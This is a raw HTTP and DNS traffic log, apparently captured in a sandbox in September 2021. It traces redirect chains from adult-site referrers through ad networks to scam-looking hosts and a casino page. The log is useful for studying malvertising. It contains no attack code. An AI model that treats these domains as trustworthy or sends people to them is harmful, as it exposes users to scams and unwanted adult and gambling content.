User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxmom.ru/ad.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:55:39 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=1b993db6-14ee-4365-96f2-d1886a1f9c31
Location: https://xml.bid-engine.com/click?i=DSlEgAfiGz4_0
X-Cache: Miss from cloudfront
Via: 1.1 83bc0649a33d85c1cf516bf48779a390.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS1-C1
X-Amz-Cf-Id: tLJsdyqbv8IQucLJmtv6tFOj0V3A9-1t9dySbs7Frdf4xRaM9QPuqA==
-
GEThttp://teentube.us/index.htmlRequestGET /index.html HTTP/1.1
Host: teentube.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html
Content-Length: 242
Last-Modified: Mon, 07 Jun 2021 06:25:53 GMT
Connection: keep-alive
ETag: "60bdbbf1-f2"
Accept-Ranges: bytes
-
GEThttp://retributionsaloon.xyz/RequestGET / HTTP/1.1
Host: retributionsaloon.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html
Content-Length: 928
Connection: close
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
-
GEThttp://789ff.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: 789ff.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.3.23
cache-control: public, max-age=180
expires: Mon, 06 Sep 2021 09:58:39 GMT
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPBHoNwNW1R9V8BsqhE%2FVHeESFwcUWUfPdxsByvx7fTdJhp0KLpZlmassrQg58JsVgT82XF42ekJSWgC154pgkvZq4ytY1JHxF543d%2BzQJInLs%2BcQa43KkWVlA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6d2a8ce3a5947-AMS
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttp://xu2.com/script/s2iurl.php?csid=1933927&s1=622591&md=0&stamat=m%7C%2C%2CAjPiN2ISoGU3B5-GH0dEdHP3xP.5f4%2CNfrBSYIWtY1N7diiP32l-SlJx_IQ8zugqcygUKqk3dhTi67wAyoz451QG4PAoR8SQfhMF-1ZiS6-L86zJpFZRAtZhGir0ZQKxmNU2nVs7ba2DxNKYP2MoB2mKW6wYRMuhsXHZdlE-TfyPrZp7_gUyrM9GLkLXjcl7GoQXco96aIcrNqSg39XWYSQIY7BInydqIzJWyHqSrxL6ZEU-gkj259FhioyLWkwNc_poBzNB4b6uiOktvg0kVgvH5cs2bWgu5CZY-I2PiozElOVcda2PCvLr-OdX2r0yFPGTk1ZVKR3Wkj9spG3kWDbi9vhayPY9lnu4MN10_ZzyFhbrWQvuq3CgVDDagchI3n4M1xKedW5pdXCAKVbsO20M18lSb-pE6-3gqHNq-SZQMLqCWm6QZqjR0a6wJOqwrRLYSeZ5f6-olORfsQnQx5aYG5OPlak8EhxoLxfxXBx7JTQnpkEsRspV3DTZCqWZGD4h77MTxFDTzFxBp5_6QR7s5-8yOIhiFYBcMtSdrrCfIhDeO0v7O87wIdAWKN8dLJfLwzaB6qOSlbnA2QU6Px3mZFHra4Bb7h-6Qj6amJSFjgtL6Q02Q%2C%2CRequestGET /script/s2iurl.php?csid=1933927&s1=622591&md=0&stamat=m%7C%2C%2CAjPiN2ISoGU3B5-GH0dEdHP3xP.5f4%2CNfrBSYIWtY1N7diiP32l-SlJx_IQ8zugqcygUKqk3dhTi67wAyoz451QG4PAoR8SQfhMF-1ZiS6-L86zJpFZRAtZhGir0ZQKxmNU2nVs7ba2DxNKYP2MoB2mKW6wYRMuhsXHZdlE-TfyPrZp7_gUyrM9GLkLXjcl7GoQXco96aIcrNqSg39XWYSQIY7BInydqIzJWyHqSrxL6ZEU-gkj259FhioyLWkwNc_poBzNB4b6uiOktvg0kVgvH5cs2bWgu5CZY-I2PiozElOVcda2PCvLr-OdX2r0yFPGTk1ZVKR3Wkj9spG3kWDbi9vhayPY9lnu4MN10_ZzyFhbrWQvuq3CgVDDagchI3n4M1xKedW5pdXCAKVbsO20M18lSb-pE6-3gqHNq-SZQMLqCWm6QZqjR0a6wJOqwrRLYSeZ5f6-olORfsQnQx5aYG5OPlak8EhxoLxfxXBx7JTQnpkEsRspV3DTZCqWZGD4h77MTxFDTzFxBp5_6QR7s5-8yOIhiFYBcMtSdrrCfIhDeO0v7O87wIdAWKN8dLJfLwzaB6qOSlbnA2QU6Px3mZFHra4Bb7h-6Qj6amJSFjgtL6Q02Q%2C%2C HTTP/1.1
Host: xu2.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622591
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: openresty
Date: Mon, 06 Sep 2021 09:55:39 GMT
Content-Type: text/html; charset=utf-8; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Referrer-Policy: no-referrer
Link: <//xu2.com>; rel=dns-prefetch,<//xu2.com>; rel=preconnect
Content-Encoding: gzip
Via: 1.1 google
-
GEThttp://millustry.top/redirect?tid=925007RequestGET /redirect?tid=925007 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://hornytit.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://djnaivalj34ub.cloudfront.net/?ianjd=935279RequestGET /?ianjd=935279 HTTP/1.1
Host: djnaivalj34ub.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 10; SM-M305F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/84.0.4147.111 Mobile Safari/537.36 GSA/11.21.9.21.arm64
Accept: */*
Referer: http://ass18.xyz/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 48639
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:55:39 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 b619a16f6f8fe9793bf642d2a8434284.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: 5bqA8J8bDF3eogNeMvxC0ofzRrI92fNdBOaog-wfyk_KpHyUooKTjw==
-
DNSbaity.ruRequestbaity.ruIN AResponsebaity.ruIN A212.107.18.203
-
DNSwww.signupandturnyourscreenoffsafepowernow.dateRequestwww.signupandturnyourscreenoffsafepowernow.dateIN AResponsewww.signupandturnyourscreenoffsafepowernow.dateIN A69.16.231.57
-
DNSeu.dspultra.comRequesteu.dspultra.comIN AResponseeu.dspultra.comIN A139.45.197.201eu.dspultra.comIN A139.45.197.203
-
DNSwww.fpcpopunder.comRequestwww.fpcpopunder.comIN AResponsewww.fpcpopunder.comIN CNAMEfpcpopunder.comfpcpopunder.comIN A66.154.95.74
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
DNSm1.firon.xyzRequestm1.firon.xyzIN AResponsem1.firon.xyzIN A173.236.118.100
-
DNSqihuu.netRequestqihuu.netIN AResponseqihuu.netIN A5.181.218.143
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSweb2.hdjav.ruRequestweb2.hdjav.ruIN AResponseweb2.hdjav.ruIN CNAMEhdjav.ruhdjav.ruIN A167.86.103.60
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
GEThttp://eu.dspultra.com/api/submit_form_request?p=d19e1c4e-6af3-45fc-9746-cc1cfc038e66&ts=1630922096&z=4345477RequestGET /api/submit_form_request?p=d19e1c4e-6af3-45fc-9746-cc1cfc038e66&ts=1630922096&z=4345477 HTTP/1.1
Host: eu.dspultra.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/43.0.2357.61 Mobile/12H321 Safari/600.1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://weightlose.tw/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSxxx1.plive.xyzRequestxxx1.plive.xyzIN AResponsexxx1.plive.xyzIN CNAMEplive.xyzplive.xyzIN A194.59.164.58
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSxxx7.plive.xyzRequestxxx7.plive.xyzIN AResponsexxx7.plive.xyzIN CNAMEplive.xyzplive.xyzIN A194.59.164.58
-
GEThttp://alfad.pro/ad/ad?p=266933&w=619425&t=893f2a57eff50d07&r=aHR0cCUzQSUyRiUyRmphdnNleC51cyUyRmdvdW5nLnBocA==&vw=685&vh=425RequestGET /ad/ad?p=266933&w=619425&t=893f2a57eff50d07&r=aHR0cCUzQSUyRiUyRmphdnNleC51cyUyRmdvdW5nLnBocA==&vw=685&vh=425 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:RESERVED)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/619425
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:55:44 GMT
Location: https://www.onlinecasinoground.nl/roulette-spel/golden-ball-roulette/
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/619177RequestGET /go/266933/619177 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/goung.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:44 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 317
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/627610RequestGET /go/266933/627610 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:44 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSsexybride.xyzRequestsexybride.xyzIN AResponsesexybride.xyzIN A194.59.164.58
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
GEThttp://sexy-wife.com/adv.phpRequestGET /adv.php HTTP/1.1
Host: sexy-wife.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://www.signupandturnyourscreenoffsafepowernow.date/zzz?yqsp=u5ARjqQKdv6zke0GG7LdkA0khF8jfuCy4l_DA5qciZZqkzFRtE4gGnbdZCQdGFK5uMDFI_ZNQiA7WvdcbQk0pA..&sid=&subid=103109_4bae97e155463612e2fe01be069ba16fRequestGET /zzz?yqsp=u5ARjqQKdv6zke0GG7LdkA0khF8jfuCy4l_DA5qciZZqkzFRtE4gGnbdZCQdGFK5uMDFI_ZNQiA7WvdcbQk0pA..&sid=&subid=103109_4bae97e155463612e2fe01be069ba16f HTTP/1.1
Host: www.signupandturnyourscreenoffsafepowernow.date
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://millustry.top/redirect?tid=925605RequestGET /redirect?tid=925605 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://av18.us/goadv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:55:44 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=09f3c2a1-acf5-4f11-bce5-45eb040fe423
Location: https://xml.bid-engine.com/click?i=qHaXwn4sUbk_0
X-Cache: Miss from cloudfront
Via: 1.1 2b11d6e7cfac22d5fd2bf9a0df8c4d2a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: 3LjJA-NwSmA7m4YQKsrQxM98cycg6bVpJsk_Z0mrV6Ij3gh_xcKdQw==
-
GEThttp://web2.hdjav.ru/ungweb2.phpRequestGET /ungweb2.php HTTP/1.1
Host: web2.hdjav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/go/266933/627600RequestGET /go/266933/627600 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:44 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNStg.socdm.comRequesttg.socdm.comIN AResponsetg.socdm.comIN CNAMEtg.dr.socdm.comtg.dr.socdm.comIN A202.241.208.55tg.dr.socdm.comIN A124.146.215.47tg.dr.socdm.comIN A124.146.215.52tg.dr.socdm.comIN A202.241.208.57tg.dr.socdm.comIN A202.241.208.52tg.dr.socdm.comIN A124.146.215.43tg.dr.socdm.comIN A124.146.215.42tg.dr.socdm.comIN A124.146.215.44tg.dr.socdm.comIN A124.146.215.48tg.dr.socdm.comIN A124.146.215.45tg.dr.socdm.comIN A202.241.208.54tg.dr.socdm.comIN A124.146.215.50tg.dr.socdm.comIN A124.146.215.49tg.dr.socdm.comIN A202.241.208.53tg.dr.socdm.comIN A202.241.208.56tg.dr.socdm.comIN A202.241.208.100tg.dr.socdm.comIN A124.146.215.46tg.dr.socdm.comIN A124.146.215.51
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSsync-tm.everesttech.netRequestsync-tm.everesttech.netIN AResponsesync-tm.everesttech.netIN CNAMEsync.tubemogul.comsync.tubemogul.comIN CNAMEsyncf.tubemogul.comsyncf.tubemogul.comIN CNAMEh2.shared.global.fastly.neth2.shared.global.fastly.netIN A151.101.2.49h2.shared.global.fastly.netIN A151.101.66.49h2.shared.global.fastly.netIN A151.101.130.49h2.shared.global.fastly.netIN A151.101.194.49
-
DNSmatch.adsrvr.orgRequestmatch.adsrvr.orgIN AResponsematch.adsrvr.orgIN CNAMEmatch-aga.adsrvr.orgmatch-aga.adsrvr.orgIN CNAMEa97adde81b00f2ca4.awsglobalaccelerator.coma97adde81b00f2ca4.awsglobalaccelerator.comIN A13.248.242.197a97adde81b00f2ca4.awsglobalaccelerator.comIN A76.223.111.131
-
DNSssc-cms.33across.comRequestssc-cms.33across.comIN AResponsessc-cms.33across.comIN CNAMEpixel.33across.compixel.33across.comIN A67.202.105.24
-
DNSssc-cms.33across.comRequestssc-cms.33across.comIN AResponsessc-cms.33across.comIN CNAMEpixel.33across.compixel.33across.comIN A208.100.17.174
-
DNSrtb.gumgum.comRequestrtb.gumgum.comIN AResponsertb.gumgum.comIN A52.55.231.190rtb.gumgum.comIN A23.21.31.76rtb.gumgum.comIN A3.227.95.85rtb.gumgum.comIN A34.233.157.225rtb.gumgum.comIN A54.167.169.186rtb.gumgum.comIN A3.216.54.241rtb.gumgum.comIN A54.159.135.119rtb.gumgum.comIN A54.156.100.179
-
DNSaax-eu.amazon-adsystem.comRequestaax-eu.amazon-adsystem.comIN AResponseaax-eu.amazon-adsystem.comIN A52.95.123.167
-
DNSus-u.openx.netRequestus-u.openx.netIN AResponseus-u.openx.netIN A34.98.64.218us-u.openx.netIN A35.244.159.8
-
GEThttp://alfad.pro/go/266933/622931RequestGET /go/266933/622931 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:45 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSssc-cms.33across.comRequestssc-cms.33across.comIN AResponsessc-cms.33across.comIN CNAMEpixel.33across.compixel.33across.comIN A208.100.17.176
-
DNSmatch.adsrvr.orgRequestmatch.adsrvr.orgIN AResponsematch.adsrvr.orgIN CNAMEmatch-aga.adsrvr.orgmatch-aga.adsrvr.orgIN CNAMEa97adde81b00f2ca4.awsglobalaccelerator.coma97adde81b00f2ca4.awsglobalaccelerator.comIN A13.248.242.197a97adde81b00f2ca4.awsglobalaccelerator.comIN A76.223.111.131
-
DNSimage4.pubmatic.comRequestimage4.pubmatic.comIN AResponseimage4.pubmatic.comIN CNAMEspug22000nfc.pubmatic.comspug22000nfc.pubmatic.comIN CNAMEspug22000nf.pubmatic.comspug22000nf.pubmatic.comIN A185.64.189.114
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNSsecurepubads.g.doubleclick.netRequestsecurepubads.g.doubleclick.netIN AResponsesecurepubads.g.doubleclick.netIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSeu-u.openx.netRequesteu-u.openx.netIN AResponseeu-u.openx.netIN A34.98.64.218eu-u.openx.netIN A35.244.159.8
-
DNSadservice.google.nlRequestadservice.google.nlIN AResponseadservice.google.nlIN CNAMEpagead46.l.doubleclick.netpagead46.l.doubleclick.netIN A172.217.168.226
-
DNSus-u.openx.netRequestus-u.openx.netIN AResponseus-u.openx.netIN A34.98.64.218us-u.openx.netIN A35.244.159.8
-
DNScreativecdn.comRequestcreativecdn.comIN AResponsecreativecdn.comIN A185.184.8.65
-
DNSrtb.gumgum.comRequestrtb.gumgum.comIN AResponsertb.gumgum.comIN A52.44.174.112rtb.gumgum.comIN A50.17.150.117rtb.gumgum.comIN A3.216.54.241rtb.gumgum.comIN A3.222.179.110rtb.gumgum.comIN A174.129.127.160rtb.gumgum.comIN A52.72.107.245rtb.gumgum.comIN A52.72.110.70rtb.gumgum.comIN A52.71.173.210
-
DNSrtb.gumgum.comRequestrtb.gumgum.comIN AResponsertb.gumgum.comIN A50.19.122.6rtb.gumgum.comIN A52.22.55.32rtb.gumgum.comIN A23.22.218.56rtb.gumgum.comIN A54.224.68.42rtb.gumgum.comIN A3.208.81.128rtb.gumgum.comIN A107.20.231.62rtb.gumgum.comIN A34.206.37.204rtb.gumgum.comIN A18.233.123.17
-
DNSpixel-sync.sitescout.comRequestpixel-sync.sitescout.comIN AResponsepixel-sync.sitescout.comIN CNAMEpixel-a.sitescout.compixel-a.sitescout.comIN A66.155.71.150
-
DNSimage6.pubmatic.comRequestimage6.pubmatic.comIN AResponseimage6.pubmatic.comIN CNAMEpugm22000nfc.pubmatic.compugm22000nfc.pubmatic.comIN CNAMEpugm22000nf.pubmatic.compugm22000nf.pubmatic.comIN A185.64.189.115
-
DNScs.emxdgt.comRequestcs.emxdgt.comIN AResponsecs.emxdgt.comIN A54.208.15.78cs.emxdgt.comIN A18.234.188.235cs.emxdgt.comIN A3.86.192.220
-
DNScs.admanmedia.comRequestcs.admanmedia.comIN AResponsecs.admanmedia.comIN A88.214.206.247
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A65.9.73.61nkwintenc.bizIN A65.9.73.49nkwintenc.bizIN A65.9.73.60nkwintenc.bizIN A65.9.73.46
-
DNSp123.xyzRequestp123.xyzIN AResponsep123.xyzIN A2.57.89.186
-
DNSd1a3jb5hjny5s4.cloudfront.netRequestd1a3jb5hjny5s4.cloudfront.netIN AResponsed1a3jb5hjny5s4.cloudfront.netIN A13.227.211.35d1a3jb5hjny5s4.cloudfront.netIN A13.227.211.148d1a3jb5hjny5s4.cloudfront.netIN A13.227.211.91d1a3jb5hjny5s4.cloudfront.netIN A13.227.211.231
-
GEThttp://d1a3jb5hjny5s4.cloudfront.net/?hbjad=928665RequestGET /?hbjad=928665 HTTP/1.1
Host: d1a3jb5hjny5s4.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:29.0) Gecko/20100101 Firefox/29.0 /29.0
Accept: */*
Referer: http://jpteen.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Length: 63287
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:55:50 GMT
access-control-allow-origin: *
Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
Content-Encoding: gzip
Pragma: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 ec5c4a66c1200ddcc562c6e98f77a48d.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: gB4gJSleqpO_Aqkpv7Ss-RR6K2xQrJvYYhzojKOPWQEQf04BzWhZkA==
-
DNSus-u.openx.netRequestus-u.openx.netIN AResponseus-u.openx.netIN A34.98.64.218us-u.openx.netIN A35.244.159.8
-
DNSc1.adform.netRequestc1.adform.netIN AResponsec1.adform.netIN CNAMEtrack.adformnet.akadns.nettrack.adformnet.akadns.netIN A37.157.6.251track.adformnet.akadns.netIN A37.157.3.28track.adformnet.akadns.netIN A37.157.4.29track.adformnet.akadns.netIN A37.157.4.39track.adformnet.akadns.netIN A37.157.2.235track.adformnet.akadns.netIN A37.157.6.245track.adformnet.akadns.netIN A37.157.3.30track.adformnet.akadns.netIN A37.157.4.40
-
DNSde.tynt.comRequestde.tynt.comIN AResponsede.tynt.comIN A208.100.17.182
-
DNScm.g.doubleclick.netRequestcm.g.doubleclick.netIN AResponsecm.g.doubleclick.netIN A142.250.179.130
-
DNSeb2.3lift.comRequesteb2.3lift.comIN AResponseeb2.3lift.comIN CNAMEeu-eb2.3lift.comeu-eb2.3lift.comIN A13.248.245.213eu-eb2.3lift.comIN A76.223.111.18
-
